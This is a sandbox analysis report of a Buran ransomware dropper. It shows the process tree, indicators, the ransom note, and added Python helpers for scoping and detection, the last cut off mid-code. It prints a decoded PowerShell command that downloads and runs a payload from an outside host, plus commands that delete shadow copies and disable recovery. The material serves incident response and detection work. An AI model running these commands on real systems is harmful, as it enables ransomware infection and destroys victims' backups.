3346.zip

General
Target: 3346.js
Filesize: 530KB
Completed: 11-08-2021 13:27
Score: 10/10
MD5: 7e23a9a840725f3431ef5825c6ab6839
SHA1: b9f307ac96ded5c42d931f7c4355756164ca0123
SHA256: 09eeec589e425f4da6dc1587e49f7f32c17f4c9e026b10c2360e5b3f72699ca7

Malware Config

Extracted
Language: ps1
Deobfuscated
URLs
ps1.dropper: https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Extracted

Path: C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family: buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: kd8eby0@inboxhub.net and decrypt one file for free. But this file should be of not valuable!
Do you really want to restore your files?
Write to email: kd8eby0@inboxhub.net
Reserved email: kd8eby0@onionmail.org
Reserved email: kd8eby0@nuke.africa
Your personal ID: 12B-343-43A
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

kd8eby0@inboxhub.net (primary contact in the note; missing from the extracted list)

kd8eby0@onionmail.org

kd8eby0@nuke.africa

Signatures 15

Tactics: Defense Evasion, Discovery, Impact, Persistence
  • Buran

    Description

    Buran, first seen in 2019, is a ransomware-as-a-service offering derived from the VegaLocker family.

  • Deletes shadow copies

    Description

    Ransomware often targets backup files to inhibit system recovery.

    TTPs

    File Deletion, Inhibit System Recovery
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid  | process
    13   | 2764 | powershell.exe
    15   | 2764 | powershell.exe
  • Downloads MZ/PE file
  • Executes dropped EXE
    jbqvTZJz.exe, smss.exe, smss.exe

    Reported IOCs

    pid  | process
    3924 | jbqvTZJz.exe
    4040 | smss.exe
    1148 | smss.exe
  • Adds Run key to start application
    jbqvTZJz.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description     | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\smss.exe\" -start" | jbqvTZJz.exe
    Key created     | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run | jbqvTZJz.exe

    Note: the dropped copy and the Run value reuse the name smss.exe, the Windows Session Manager Subsystem. The real binary only runs from C:\Windows\System32; an smss.exe under a user profile with a -start argument is the persistence artifact to hunt for.
  • Enumerates connected drives
    smss.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs

    description | ioc | process
    File opened (read-only) | \??\A:, B:, E:, F:, G:, H:, I:, J:, K:, L:, M:, N:, O:, P:, Q:, R:, S:, T:, U:, V:, W:, X:, Y:, Z: (every drive letter except C: and D:, 24 opens in all) | smss.exe
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    17   | geoiptool.com
  • Drops file in Program Files directory
    smss.exe

    Encrypted files keep their original name and gain the suffix .kd8eby0.12B-343-43A (the contact mailbox's local part followed by the personal ID from the ransom note); the note itself is created in each directory visited. "File opened for modification" on a path without the suffix means the file was written but the rename had not yet been observed when the entry was logged.

    Reported IOCs

    description | ioc (process: smss.exe for every row)
    File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp3-pl.xrm-ms
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-40.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js
    File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME.txt
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml
    File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ul-oob.xrm-ms
    File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png
    File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\view.html
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line_2x.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\ui-strings.js.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.kd8eby0.12B-343-43A
    File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
    File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\openssl64.dlla.manifest.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Line_White@1x.png
    File opened for modification | C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo
    File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-black_scale-200.png
    File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\Movie-TVStoreLogo.scale-125.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\MedTile.scale-125.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-16_altform-unplated_contrast-white.png
    File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-sl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js
    File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ppd.xrm-ms.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-16.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-100_contrast-high.png
    File opened for modification | C:\Program Files\Microsoft Office\root\vreg\dcf.x-none.msi.16.x-none.vreg.dat
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupWideTile.scale-100.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\SmallTile.scale-200.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml
    File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo.png.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_RTL_Tablet.mp4
    File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\SUCTION.WAV
    File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\index.win32.bundle.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-64_contrast-white.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.png
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ppd.xrm-ms
    File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\hi\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Cloud.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\it_16x11.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.js
    File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz
    File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.White@3x.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\Fireworks.jpg
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-unplated.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-64_altform-unplated_contrast-white.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Aerial.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\ui-strings.js.kd8eby0.12B-343-43A
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-64.png
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\ThirdPartyNotices_Arkadium.txt
    File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.png
    File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailSmallTile.scale-100.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png
    File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js.kd8eby0.12B-343-43A
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Interacts with shadow copies
    vssadmin.exe, vssadmin.exe

    Description

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    TTPs

    File Deletion, Inhibit System Recovery

    Reported IOCs

    pid  | process
    3124 | vssadmin.exe
    3272 | vssadmin.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pid  | process
    2764 | powershell.exe
    2764 | powershell.exe
    2764 | powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, jbqvTZJz.exe, WMIC.exe, WMIC.exe, vssvc.exe

    Note: WMIC.exe enabling nearly every privilege in its token is its normal start-up behaviour, so the WMIC rows are noise on their own; the signal is the parent chain (smss.exe -> cmd.exe -> wmic shadowcopy delete). The SeDebugPrivilege requests by powershell.exe and jbqvTZJz.exe are the ones worth noting. Numeric entries (33 to 36) are privilege LUIDs the sandbox did not resolve to a name.

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 2764 | powershell.exe
    Token: SeDebugPrivilege | 3924 | jbqvTZJz.exe
    Token: SeDebugPrivilege | 3924 | jbqvTZJz.exe
    Token: SeIncreaseQuotaPrivilege | 2976 | WMIC.exe
    Token: SeSecurityPrivilege | 2976 | WMIC.exe
    Token: SeTakeOwnershipPrivilege | 2976 | WMIC.exe
    Token: SeLoadDriverPrivilege | 2976 | WMIC.exe
    Token: SeSystemProfilePrivilege | 2976 | WMIC.exe
    Token: SeSystemtimePrivilege | 2976 | WMIC.exe
    Token: SeProfSingleProcessPrivilege | 2976 | WMIC.exe
    Token: SeIncBasePriorityPrivilege | 2976 | WMIC.exe
    Token: SeCreatePagefilePrivilege | 2976 | WMIC.exe
    Token: SeBackupPrivilege | 2976 | WMIC.exe
    Token: SeRestorePrivilege | 2976 | WMIC.exe
    Token: SeShutdownPrivilege | 2976 | WMIC.exe
    Token: SeDebugPrivilege | 2976 | WMIC.exe
    Token: SeSystemEnvironmentPrivilege | 2976 | WMIC.exe
    Token: SeRemoteShutdownPrivilege | 2976 | WMIC.exe
    Token: SeUndockPrivilege | 2976 | WMIC.exe
    Token: SeManageVolumePrivilege | 2976 | WMIC.exe
    Token: 33 | 2976 | WMIC.exe
    Token: 34 | 2976 | WMIC.exe
    Token: 35 | 2976 | WMIC.exe
    Token: 36 | 2976 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 2892 | WMIC.exe
    Token: SeSecurityPrivilege | 2892 | WMIC.exe
    Token: SeTakeOwnershipPrivilege | 2892 | WMIC.exe
    Token: SeLoadDriverPrivilege | 2892 | WMIC.exe
    Token: SeSystemProfilePrivilege | 2892 | WMIC.exe
    Token: SeSystemtimePrivilege | 2892 | WMIC.exe
    Token: SeProfSingleProcessPrivilege | 2892 | WMIC.exe
    Token: SeIncBasePriorityPrivilege | 2892 | WMIC.exe
    Token: SeCreatePagefilePrivilege | 2892 | WMIC.exe
    Token: SeBackupPrivilege | 2892 | WMIC.exe
    Token: SeRestorePrivilege | 2892 | WMIC.exe
    Token: SeShutdownPrivilege | 2892 | WMIC.exe
    Token: SeDebugPrivilege | 2892 | WMIC.exe
    Token: SeSystemEnvironmentPrivilege | 2892 | WMIC.exe
    Token: SeRemoteShutdownPrivilege | 2892 | WMIC.exe
    Token: SeUndockPrivilege | 2892 | WMIC.exe
    Token: SeManageVolumePrivilege | 2892 | WMIC.exe
    Token: 33 | 2892 | WMIC.exe
    Token: 34 | 2892 | WMIC.exe
    Token: 35 | 2892 | WMIC.exe
    Token: 36 | 2892 | WMIC.exe
    Token: SeBackupPrivilege | 2352 | vssvc.exe
    Token: SeRestorePrivilege | 2352 | vssvc.exe
    Token: SeAuditPrivilege | 2352 | vssvc.exe
    Token: SeIncreaseQuotaPrivilege | 2892 | WMIC.exe
    Token: SeSecurityPrivilege | 2892 | WMIC.exe
    Token: SeTakeOwnershipPrivilege | 2892 | WMIC.exe
    Token: SeLoadDriverPrivilege | 2892 | WMIC.exe
    Token: SeSystemProfilePrivilege | 2892 | WMIC.exe
    Token: SeSystemtimePrivilege | 2892 | WMIC.exe
    Token: SeProfSingleProcessPrivilege | 2892 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 2976 | WMIC.exe
    Token: SeIncBasePriorityPrivilege | 2892 | WMIC.exe
    Token: SeSecurityPrivilege | 2976 | WMIC.exe
    Token: SeCreatePagefilePrivilege | 2892 | WMIC.exe
    Token: SeBackupPrivilege | 2892 | WMIC.exe
    Token: SeTakeOwnershipPrivilege | 2976 | WMIC.exe
    Token: SeRestorePrivilege | 2892 | WMIC.exe
    Token: SeLoadDriverPrivilege | 2976 | WMIC.exe
    Token: SeShutdownPrivilege | 2892 | WMIC.exe
  • Suspicious use of WriteProcessMemory
    wscript.exe, cmd.exe, powershell.exe, jbqvTZJz.exe, smss.exe, cmd.exe, cmd.exe, cmd.exe

    Note: most rows are the ordinary parent-writes-to-child pattern of process creation. The exception is jbqvTZJz.exe writing six times into a notepad.exe it spawned (PID 3588), which is consistent with process injection; the report attributes no further activity to PID 3588, so treat it as an unconfirmed injection target.

    Reported IOCs

    description | pid | process | target process | events
    PID 568 wrote to memory of 2960 | 568 | wscript.exe | cmd.exe | 2
    PID 2960 wrote to memory of 2764 | 2960 | cmd.exe | powershell.exe | 2
    PID 2764 wrote to memory of 3924 | 2764 | powershell.exe | jbqvTZJz.exe | 3
    PID 3924 wrote to memory of 4040 | 3924 | jbqvTZJz.exe | smss.exe | 3
    PID 3924 wrote to memory of 3588 | 3924 | jbqvTZJz.exe | notepad.exe | 6
    PID 4040 wrote to memory of 1824 | 4040 | smss.exe | cmd.exe | 3
    PID 4040 wrote to memory of 3604 | 4040 | smss.exe | cmd.exe | 3
    PID 4040 wrote to memory of 1900 | 4040 | smss.exe | cmd.exe | 3
    PID 4040 wrote to memory of 3732 | 4040 | smss.exe | cmd.exe | 3
    PID 4040 wrote to memory of 3032 | 4040 | smss.exe | cmd.exe | 3
    PID 4040 wrote to memory of 2832 | 4040 | smss.exe | cmd.exe | 3
    PID 4040 wrote to memory of 1148 | 4040 | smss.exe | smss.exe | 3
    PID 3032 wrote to memory of 3124 | 3032 | cmd.exe | vssadmin.exe | 3
    PID 2832 wrote to memory of 2892 | 2832 | cmd.exe | WMIC.exe | 3
    PID 1824 wrote to memory of 2976 | 1824 | cmd.exe | WMIC.exe | 3
    PID 2832 wrote to memory of 3272 | 2832 | cmd.exe | vssadmin.exe | 3
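The "Drops file in Program Files directory" entries above show Buran's naming scheme: an encrypted file keeps its original name and gains the suffix .kd8eby0.12B-343-43A (the contact mailbox's local part followed by the personal ID from the note), and the ransom note is created in every directory it touches. The scoping helper below is an added example, not from the sandbox: OBSERVED_PATHS copies a handful of paths from the report plus two untouched ones for contrast; parse_encrypted_name() recovers the original name, contact and victim ID from a marked path, and scope() buckets a listing so a responder can count notes, encrypted files and distinct victim IDs. A path listed as "opened for modification" without the suffix is not proof it survived; the rename can simply post-date the snapshot, which is why that bucket is named untouched_or_pending.

```python
import re
from collections import Counter

# Paths copied from the sandbox report's "Drops file in Program Files directory"
# entries (constructed sample for this example; two untouched paths added for contrast).
OBSERVED_PATHS = [
    r"C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.kd8eby0.12B-343-43A",
    r"C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html.kd8eby0.12B-343-43A",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif.kd8eby0.12B-343-43A",
    r"C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML.kd8eby0.12B-343-43A",
    r"C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
    r"C:\Program Files\VideoLAN\VLC\lua\http\view.html",
    r"C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME.txt",
]

RANSOM_NOTE_NAME = "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"

# <original name>.<contact mailbox local part>.<victim ID>, e.g. "...XML.kd8eby0.12B-343-43A".
# The victim-ID shape (three hex triplets) is taken from the note's "Your personal ID" line.
SUFFIX_RE = re.compile(
    r"^(?P<orig>.+?)\.(?P<contact>[A-Za-z0-9]+)\."
    r"(?P<vid>[0-9A-Fa-f]{3}-[0-9A-Fa-f]{3}-[0-9A-Fa-f]{3})$"
)


def parse_encrypted_name(path: str):
    """Return (original_path, contact, victim_id) for a marked path, else None."""
    m = SUFFIX_RE.match(path)
    if not m:
        return None
    return m.group("orig"), m.group("contact"), m.group("vid")


def scope(paths, note_name: str = RANSOM_NOTE_NAME) -> dict:
    """Bucket a path listing into encrypted files, ransom notes and everything else."""
    encrypted, notes, other = [], [], []
    victim_ids, contacts, note_dirs = set(), set(), set()
    original_ext = Counter()
    for p in paths:
        folder, _, name = p.rpartition("\\")
        if name == note_name:
            notes.append(p)
            note_dirs.add(folder)
            continue
        parsed = parse_encrypted_name(p)
        if parsed:
            orig, contact, vid = parsed
            encrypted.append(orig)
            contacts.add(contact)
            victim_ids.add(vid)
            original_ext[orig.rsplit(".", 1)[-1].lower()] += 1
        else:
            other.append(p)
    return {
        "encrypted": encrypted,                  # original names, suffix stripped
        "ransom_notes": notes,
        "untouched_or_pending": other,           # no marker seen yet; not proof of safety
        "victim_ids": sorted(victim_ids),        # more than one means more than one campaign/host key
        "contacts": sorted(contacts),
        "by_original_extension": dict(original_ext),
        "directories_with_note": sorted(note_dirs),
    }


if __name__ == "__main__":
    summary = scope(OBSERVED_PATHS)
    for key in ("victim_ids", "contacts", "by_original_extension"):
        print(key, summary[key])
    print(len(summary["encrypted"]), "encrypted,", len(summary["ransom_notes"]), "notes")
```

On a real host, feed scope() the output of a recursive directory walk; the victim_ids bucket is the quick check that a fileserver was hit by a single key (one ID) rather than several infected clients.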
Processes 18
  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3346.js
    Suspicious use of WriteProcessMemory
    PID:568
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        Decoded (-enc is base64 of UTF-16LE text): IEX (New-Object Net.Webclient).downloadstring("https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php")
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe
          "C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe"
          Executes dropped EXE
          Adds Run key to start application
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of WriteProcessMemory
          PID:3924
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
            Executes dropped EXE
            Enumerates connected drives
            Suspicious use of WriteProcessMemory
            PID:4040
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
              Suspicious use of WriteProcessMemory
              PID:1824
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                Suspicious use of AdjustPrivilegeToken
                PID:2976
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
              PID:3604
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
              PID:1900
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
              PID:3732
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
              Executes dropped EXE
              Drops file in Program Files directory
              PID:1148
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
              Suspicious use of WriteProcessMemory
              PID:2832
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                Suspicious use of AdjustPrivilegeToken
                PID:2892
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin delete shadows /all /quiet
                Interacts with shadow copies
                PID:3272
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
              Suspicious use of WriteProcessMemory
              PID:3032
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin delete shadows /all /quiet
                Interacts with shadow copies
                PID:3124
          • C:\Windows\SysWOW64\notepad.exe
            notepad.exe
            PID:3588
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:2352
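The process tree above shows the full recovery-inhibition sequence Buran runs from the renamed smss.exe: wmic shadowcopy delete, bcdedit /set {default} recoveryenabled no, bcdedit /set {default} bootstatuspolicy ignoreallfailures, wbadmin delete catalog -quiet and vssadmin delete shadows /all /quiet. The detector below is an added example, not part of the report: EVENTS is a constructed process-creation log whose command lines and parent/child links are copied from the tree, with two benign events added; it groups rule hits by process-tree root so that several techniques fired from one tree score higher than a lone vssadmin call, and it separately flags a protected system-process name running outside the system directories. The rule names, the SYSTEM_ONLY_NAMES list and the verdict strings are this example's assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events. Command lines and parent/child links are
# copied from the sandbox process tree; the record layout is this example's own,
# and the last two events are benign noise added to show what does not fire.
EVENTS = [
    {"pid": 4040, "ppid": 3924, "image": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe",
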